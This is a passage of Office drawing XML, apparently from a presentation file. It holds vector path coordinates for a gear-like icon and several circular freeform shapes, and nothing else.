                    <a:pt x="207" y="152"/>
                    <a:pt x="197" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="126"/>
                    <a:pt x="182" y="126"/>
                    <a:pt x="182" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="126"/>
                    <a:pt x="179" y="126"/>
                    <a:pt x="178" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="126"/>
                    <a:pt x="178" y="126"/>
                    <a:pt x="178" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="176"/>
                    <a:pt x="128" y="176"/>
                    <a:pt x="128" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="177"/>
                    <a:pt x="127" y="179"/>
                    <a:pt x="128" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="195"/>
                    <a:pt x="143" y="195"/>
                    <a:pt x="143" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="212"/>
                    <a:pt x="163" y="239"/>
                    <a:pt x="151" y="260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="140" y="280"/>
                    <a:pt x="131" y="300"/>
                    <a:pt x="125" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="345"/>
                    <a:pt x="98" y="360"/>
                    <a:pt x="74" y="360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="360"/>
                    <a:pt x="53" y="360"/>
                    <a:pt x="53" y="360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="360"/>
                    <a:pt x="51" y="361"/>
                    <a:pt x="51" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="434"/>
                    <a:pt x="51" y="434"/>
                    <a:pt x="51" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="435"/>
                    <a:pt x="52" y="436"/>
                    <a:pt x="53" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="436"/>
                    <a:pt x="74" y="436"/>
                    <a:pt x="74" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="436"/>
                    <a:pt x="119" y="452"/>
                    <a:pt x="125" y="476"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="496"/>
                    <a:pt x="140" y="516"/>
                    <a:pt x="151" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="557"/>
                    <a:pt x="159" y="583"/>
                    <a:pt x="142" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="615"/>
                    <a:pt x="128" y="615"/>
                    <a:pt x="128" y="615"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="616"/>
                    <a:pt x="127" y="617"/>
                    <a:pt x="128" y="618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="668"/>
                    <a:pt x="178" y="668"/>
                    <a:pt x="178" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="668"/>
                    <a:pt x="180" y="668"/>
                    <a:pt x="181" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="668"/>
                    <a:pt x="182" y="668"/>
                    <a:pt x="182" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="654"/>
                    <a:pt x="196" y="654"/>
                    <a:pt x="196" y="654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="637"/>
                    <a:pt x="239" y="634"/>
                    <a:pt x="260" y="646"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="280" y="657"/>
                    <a:pt x="301" y="666"/>
                    <a:pt x="321" y="672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="679"/>
                    <a:pt x="361" y="700"/>
                    <a:pt x="361" y="723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="744"/>
                    <a:pt x="361" y="744"/>
                    <a:pt x="361" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="745"/>
                    <a:pt x="362" y="746"/>
                    <a:pt x="363" y="746"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="434" y="746"/>
                    <a:pt x="434" y="746"/>
                    <a:pt x="434" y="746"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="436" y="746"/>
                    <a:pt x="437" y="745"/>
                    <a:pt x="437" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="723"/>
                    <a:pt x="437" y="723"/>
                    <a:pt x="437" y="723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="700"/>
                    <a:pt x="453" y="679"/>
                    <a:pt x="476" y="672"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="497" y="666"/>
                    <a:pt x="518" y="657"/>
                    <a:pt x="537" y="646"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="559" y="634"/>
                    <a:pt x="585" y="637"/>
                    <a:pt x="602" y="654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="668"/>
                    <a:pt x="616" y="668"/>
                    <a:pt x="616" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="616" y="668"/>
                    <a:pt x="619" y="668"/>
                    <a:pt x="620" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="620" y="668"/>
                    <a:pt x="620" y="668"/>
                    <a:pt x="620" y="668"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="670" y="618"/>
                    <a:pt x="670" y="618"/>
                    <a:pt x="670" y="618"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="670" y="618"/>
                    <a:pt x="670" y="615"/>
                    <a:pt x="670" y="615"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="655" y="600"/>
                    <a:pt x="655" y="600"/>
                    <a:pt x="655" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="639" y="583"/>
                    <a:pt x="635" y="557"/>
                    <a:pt x="647" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="658" y="516"/>
                    <a:pt x="667" y="496"/>
                    <a:pt x="672" y="476"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="679" y="452"/>
                    <a:pt x="700" y="436"/>
                    <a:pt x="724" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="744" y="436"/>
                    <a:pt x="744" y="436"/>
                    <a:pt x="744" y="436"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="746" y="436"/>
                    <a:pt x="747" y="435"/>
                    <a:pt x="747" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="747" y="363"/>
                    <a:pt x="747" y="363"/>
                    <a:pt x="747" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="747" y="361"/>
                    <a:pt x="746" y="360"/>
                    <a:pt x="744" y="360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="724" y="360"/>
                    <a:pt x="724" y="360"/>
                    <a:pt x="724" y="360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="700" y="360"/>
                    <a:pt x="679" y="345"/>
                    <a:pt x="672" y="321"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="666" y="300"/>
                    <a:pt x="658" y="280"/>
                    <a:pt x="646" y="260"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="634" y="239"/>
                    <a:pt x="638" y="212"/>
                    <a:pt x="655" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="670" y="180"/>
                    <a:pt x="670" y="180"/>
                    <a:pt x="670" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="670" y="176"/>
                    <a:pt x="670" y="176"/>
                    <a:pt x="670" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="620" y="126"/>
                    <a:pt x="620" y="126"/>
                    <a:pt x="620" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="620" y="126"/>
                    <a:pt x="616" y="126"/>
                    <a:pt x="616" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="601" y="142"/>
                    <a:pt x="601" y="142"/>
                    <a:pt x="601" y="142"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584" y="158"/>
                    <a:pt x="557" y="162"/>
                    <a:pt x="536" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="517" y="139"/>
                    <a:pt x="497" y="130"/>
                    <a:pt x="476" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="453" y="118"/>
                    <a:pt x="437" y="97"/>
                    <a:pt x="437" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="53"/>
                    <a:pt x="437" y="53"/>
                    <a:pt x="437" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="52"/>
                    <a:pt x="436" y="50"/>
                    <a:pt x="434" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="50"/>
                    <a:pt x="363" y="50"/>
                    <a:pt x="363" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="50"/>
                    <a:pt x="361" y="52"/>
                    <a:pt x="361" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="73"/>
                    <a:pt x="361" y="73"/>
                    <a:pt x="361" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="97"/>
                    <a:pt x="345" y="118"/>
                    <a:pt x="322" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308" y="128"/>
                    <a:pt x="294" y="121"/>
                    <a:pt x="290" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="94"/>
                    <a:pt x="294" y="80"/>
                    <a:pt x="307" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="308" y="76"/>
                    <a:pt x="310" y="75"/>
                    <a:pt x="310" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="53"/>
                    <a:pt x="310" y="53"/>
                    <a:pt x="310" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="24"/>
                    <a:pt x="334" y="0"/>
                    <a:pt x="363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64" y="0"/>
                    <a:pt x="488" y="24"/>
                    <a:pt x="488" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="73"/>
                    <a:pt x="488" y="73"/>
                    <a:pt x="488" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="75"/>
                    <a:pt x="489" y="76"/>
                    <a:pt x="490" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="514" y="83"/>
                    <a:pt x="538" y="93"/>
                    <a:pt x="561" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="562" y="107"/>
                    <a:pt x="564" y="107"/>
                    <a:pt x="565" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="580" y="90"/>
                    <a:pt x="580" y="90"/>
                    <a:pt x="580" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="600" y="70"/>
                    <a:pt x="635" y="70"/>
                    <a:pt x="656" y="90"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="706" y="140"/>
                    <a:pt x="706" y="140"/>
                    <a:pt x="706" y="140"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="716" y="151"/>
                    <a:pt x="721" y="164"/>
                    <a:pt x="721" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="721" y="192"/>
                    <a:pt x="716" y="206"/>
                    <a:pt x="706" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="690" y="231"/>
                    <a:pt x="690" y="231"/>
                    <a:pt x="690" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="232"/>
                    <a:pt x="690" y="234"/>
                    <a:pt x="690" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="704" y="258"/>
                    <a:pt x="714" y="282"/>
                    <a:pt x="721" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="721" y="308"/>
                    <a:pt x="722" y="310"/>
                    <a:pt x="724" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="744" y="310"/>
                    <a:pt x="744" y="310"/>
                    <a:pt x="744" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="774" y="310"/>
                    <a:pt x="797" y="334"/>
                    <a:pt x="797" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="797" y="434"/>
                    <a:pt x="797" y="434"/>
                    <a:pt x="797" y="434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="797" y="463"/>
                    <a:pt x="774" y="487"/>
                    <a:pt x="744" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="724" y="487"/>
                    <a:pt x="724" y="487"/>
                    <a:pt x="724" y="487"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="722" y="487"/>
                    <a:pt x="721" y="489"/>
                    <a:pt x="721" y="490"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="714" y="514"/>
                    <a:pt x="704" y="538"/>
                    <a:pt x="691" y="560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="691" y="562"/>
                    <a:pt x="690" y="563"/>
                    <a:pt x="691" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="706" y="579"/>
                    <a:pt x="706" y="579"/>
                    <a:pt x="706" y="579"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="716" y="589"/>
                    <a:pt x="721" y="602"/>
                    <a:pt x="721" y="616"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="721" y="631"/>
                    <a:pt x="716" y="644"/>
                    <a:pt x="706" y="654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="656" y="704"/>
                    <a:pt x="656" y="704"/>
                    <a:pt x="656" y="704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="636" y="724"/>
                    <a:pt x="601" y="724"/>
                    <a:pt x="580" y="704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="566" y="690"/>
                    <a:pt x="566" y="690"/>
                    <a:pt x="566" y="690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="565" y="689"/>
                    <a:pt x="564" y="690"/>
                    <a:pt x="563" y="690"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="539" y="703"/>
                    <a:pt x="515" y="714"/>
                    <a:pt x="490" y="721"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="489" y="721"/>
                    <a:pt x="488" y="722"/>
                    <a:pt x="488" y="723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="744"/>
                    <a:pt x="488" y="744"/>
                    <a:pt x="488" y="744"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="488" y="773"/>
                    <a:pt x="464" y="797"/>
                    <a:pt x="434" y="7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91" name="Freeform 103">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C9F7EA4-D1DA-F049-82C7-DA1B2034FF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53600" y="155575"/>
              <a:ext cx="106363" cy="104775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50 h 252"/>
                <a:gd name="T12" fmla="*/ 50 w 252"/>
                <a:gd name="T13" fmla="*/ 126 h 252"/>
                <a:gd name="T14" fmla="*/ 126 w 252"/>
                <a:gd name="T15" fmla="*/ 202 h 252"/>
                <a:gd name="T16" fmla="*/ 202 w 252"/>
                <a:gd name="T17" fmla="*/ 126 h 252"/>
                <a:gd name="T18" fmla="*/ 126 w 252"/>
                <a:gd name="T19" fmla="*/ 5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6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6"/>
                    <a:pt x="195" y="252"/>
                    <a:pt x="126" y="252"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="50"/>
                    <a:pt x="50" y="84"/>
                    <a:pt x="50" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="168"/>
                    <a:pt x="84" y="202"/>
                    <a:pt x="126" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="202"/>
                    <a:pt x="202" y="168"/>
                    <a:pt x="202" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="84"/>
                    <a:pt x="168" y="50"/>
                    <a:pt x="12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92" name="Freeform 104">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8254F29A-FDB0-A34B-A663-0BB4838076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53600" y="776288"/>
              <a:ext cx="106363" cy="106363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50 h 252"/>
                <a:gd name="T12" fmla="*/ 50 w 252"/>
                <a:gd name="T13" fmla="*/ 126 h 252"/>
                <a:gd name="T14" fmla="*/ 126 w 252"/>
                <a:gd name="T15" fmla="*/ 202 h 252"/>
                <a:gd name="T16" fmla="*/ 202 w 252"/>
                <a:gd name="T17" fmla="*/ 126 h 252"/>
                <a:gd name="T18" fmla="*/ 126 w 252"/>
                <a:gd name="T19" fmla="*/ 5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6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6"/>
                    <a:pt x="195" y="252"/>
                    <a:pt x="126" y="252"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="50"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="50"/>
                    <a:pt x="50" y="84"/>
                    <a:pt x="50" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="168"/>
                    <a:pt x="84" y="202"/>
                    <a:pt x="126" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="202"/>
                    <a:pt x="202" y="168"/>
                    <a:pt x="202" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="84"/>
                    <a:pt x="168" y="50"/>
                    <a:pt x="12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93" name="Freeform 105">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CA93B82-ABA0-854E-AEA1-A143D92106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42450" y="465138"/>
              <a:ext cx="106363" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 253 h 253"/>
                <a:gd name="T2" fmla="*/ 0 w 253"/>
                <a:gd name="T3" fmla="*/ 127 h 253"/>
                <a:gd name="T4" fmla="*/ 126 w 253"/>
                <a:gd name="T5" fmla="*/ 0 h 253"/>
                <a:gd name="T6" fmla="*/ 253 w 253"/>
                <a:gd name="T7" fmla="*/ 127 h 253"/>
                <a:gd name="T8" fmla="*/ 126 w 253"/>
                <a:gd name="T9" fmla="*/ 253 h 253"/>
                <a:gd name="T10" fmla="*/ 126 w 253"/>
                <a:gd name="T11" fmla="*/ 51 h 253"/>
                <a:gd name="T12" fmla="*/ 51 w 253"/>
                <a:gd name="T13" fmla="*/ 127 h 253"/>
                <a:gd name="T14" fmla="*/ 126 w 253"/>
                <a:gd name="T15" fmla="*/ 202 h 253"/>
                <a:gd name="T16" fmla="*/ 202 w 253"/>
                <a:gd name="T17" fmla="*/ 127 h 253"/>
                <a:gd name="T18" fmla="*/ 126 w 253"/>
                <a:gd name="T19" fmla="*/ 5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253">
                  <a:moveTo>
                    <a:pt x="126" y="253"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="253"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57"/>
                    <a:pt x="57" y="0"/>
                    <a:pt x="126" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="0"/>
                    <a:pt x="253" y="57"/>
                    <a:pt x="253" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="196"/>
                    <a:pt x="196" y="253"/>
                    <a:pt x="126" y="253"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="51"/>
                    <a:pt x="51" y="85"/>
                    <a:pt x="51" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="168"/>
                    <a:pt x="85" y="202"/>
                    <a:pt x="126" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="202"/>
                    <a:pt x="202" y="168"/>
                    <a:pt x="202" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="85"/>
                    <a:pt x="168" y="51"/>
                    <a:pt x="12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94" name="Freeform 106">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D23FB6F8-CBE1-0C4E-9E61-8C86403A06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64750" y="465138"/>
              <a:ext cx="106363" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 253 h 253"/>
                <a:gd name="T2" fmla="*/ 0 w 253"/>
                <a:gd name="T3" fmla="*/ 127 h 253"/>
                <a:gd name="T4" fmla="*/ 126 w 253"/>
                <a:gd name="T5" fmla="*/ 0 h 253"/>
                <a:gd name="T6" fmla="*/ 253 w 253"/>
                <a:gd name="T7" fmla="*/ 127 h 253"/>
                <a:gd name="T8" fmla="*/ 126 w 253"/>
                <a:gd name="T9" fmla="*/ 253 h 253"/>
                <a:gd name="T10" fmla="*/ 126 w 253"/>
                <a:gd name="T11" fmla="*/ 51 h 253"/>
                <a:gd name="T12" fmla="*/ 51 w 253"/>
                <a:gd name="T13" fmla="*/ 127 h 253"/>
                <a:gd name="T14" fmla="*/ 126 w 253"/>
                <a:gd name="T15" fmla="*/ 202 h 253"/>
                <a:gd name="T16" fmla="*/ 202 w 253"/>
                <a:gd name="T17" fmla="*/ 127 h 253"/>
                <a:gd name="T18" fmla="*/ 126 w 253"/>
                <a:gd name="T19" fmla="*/ 5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253">
                  <a:moveTo>
                    <a:pt x="126" y="253"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="253"/>
                    <a:pt x="0" y="196"/>
                    <a:pt x="0" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57"/>
                    <a:pt x="57" y="0"/>
                    <a:pt x="126" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="0"/>
                    <a:pt x="253" y="57"/>
                    <a:pt x="253" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="253" y="196"/>
                    <a:pt x="196" y="253"/>
                    <a:pt x="126" y="253"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="126" y="51"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="51"/>
                    <a:pt x="51" y="85"/>
                    <a:pt x="51" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="168"/>
                    <a:pt x="85" y="202"/>
                    <a:pt x="126" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="202"/>
                    <a:pt x="202" y="168"/>
                    <a:pt x="202" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="85"/>
                    <a:pt x="168" y="51"/>
                    <a:pt x="12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95" name="Freeform 107">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E92E731B-4C4B-E84A-8962-F6ACB9C313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232938" y="246063"/>
              <a:ext cx="106363" cy="104775"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 126 w 253"/>
                <a:gd name="T1" fmla="*/ 252 h 252"/>
                <a:gd name="T2" fmla="*/ 37 w 253"/>
                <a:gd name="T3" fmla="*/ 215 h 252"/>
                <a:gd name="T4" fmla="*/ 0 w 253"/>
                <a:gd name="T5" fmla="*/ 126 h 252"/>
                <a:gd name="T6" fmla="*/ 37 w 253"/>
                <a:gd name="T7" fmla="*/ 37 h 252"/>
                <a:gd name="T8" fmla="*/ 126 w 253"/>
                <a:gd name="T9" fmla="*/ 0 h 252"/>
                <a:gd name="T10" fmla="*/ 216 w 253"/>
                <a:gd name="T11" fmla="*/ 37 h 252"/>
                <a:gd name="T12" fmla="*/ 216 w 253"/>
                <a:gd name="T13" fmla="*/ 37 h 252"/>
                <a:gd name="T14" fmla="*/ 216 w 253"/>
                <a:gd name="T15" fmla="*/ 37 h 252"/>
                <a:gd name="T16" fmla="*/ 253 w 253"/>
                <a:gd name="T17" fmla="*/ 126 h 252"/>
                <a:gd name="T18" fmla="*/ 216 w 253"/>
                <a:gd name="T19" fmla="*/ 215 h 252"/>
                <a:gd name="T20" fmla="*/ 126 w 253"/>
                <a:gd name="T21" fmla="*/ 252 h 252"/>
                <a:gd name="T22" fmla="*/ 126 w 253"/>
                <a:gd name="T23" fmla="*/ 51 h 252"/>
                <a:gd name="T24" fmla="*/ 73 w 253"/>
                <a:gd name="T25" fmla="*/ 73 h 252"/>
                <a:gd name="T26" fmla="*/ 51 w 253"/>
                <a:gd name="T27" fmla="*/ 126 h 252"/>
                <a:gd name="T28" fmla="*/ 73 w 253"/>
                <a:gd name="T29" fmla="*/ 180 h 252"/>
                <a:gd name="T30" fmla="*/ 180 w 253"/>
                <a:gd name="T31" fmla="*/ 180 h 252"/>
                <a:gd name="T32" fmla="*/ 202 w 253"/>
                <a:gd name="T33" fmla="*/ 126 h 252"/>
                <a:gd name="T34" fmla="*/ 180 w 253"/>
                <a:gd name="T35" fmla="*/ 73 h 252"/>
                <a:gd name="T36" fmla="*/ 180 w 253"/>
                <a:gd name="T37" fmla="*/ 73 h 252"/>
                <a:gd name="T38" fmla="*/ 126 w 253"/>
                <a:gd name="T39" fmla="*/ 5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2">
                  <a:moveTo>
                    <a:pt x="126" y="252"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="252"/>
                    <a:pt x="61" y="239"/>
                    <a:pt x="37" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="192"/>
                    <a:pt x="0" y="160"/>
                    <a:pt x="0" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="92"/>
                    <a:pt x="13" y="61"/>
                    <a:pt x="37" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="13"/>
                    <a:pt x="93" y="0"/>
                    <a:pt x="126" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="0"/>
                    <a:pt x="192" y="13"/>
                    <a:pt x="216" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="37"/>
                    <a:pt x="216" y="37"/>
                    <a:pt x="216" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="37"/>
                    <a:pt x="216" y="37"/>
                    <a:pt x="216" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="61"/>
                    <a:pt x="253" y="92"/>
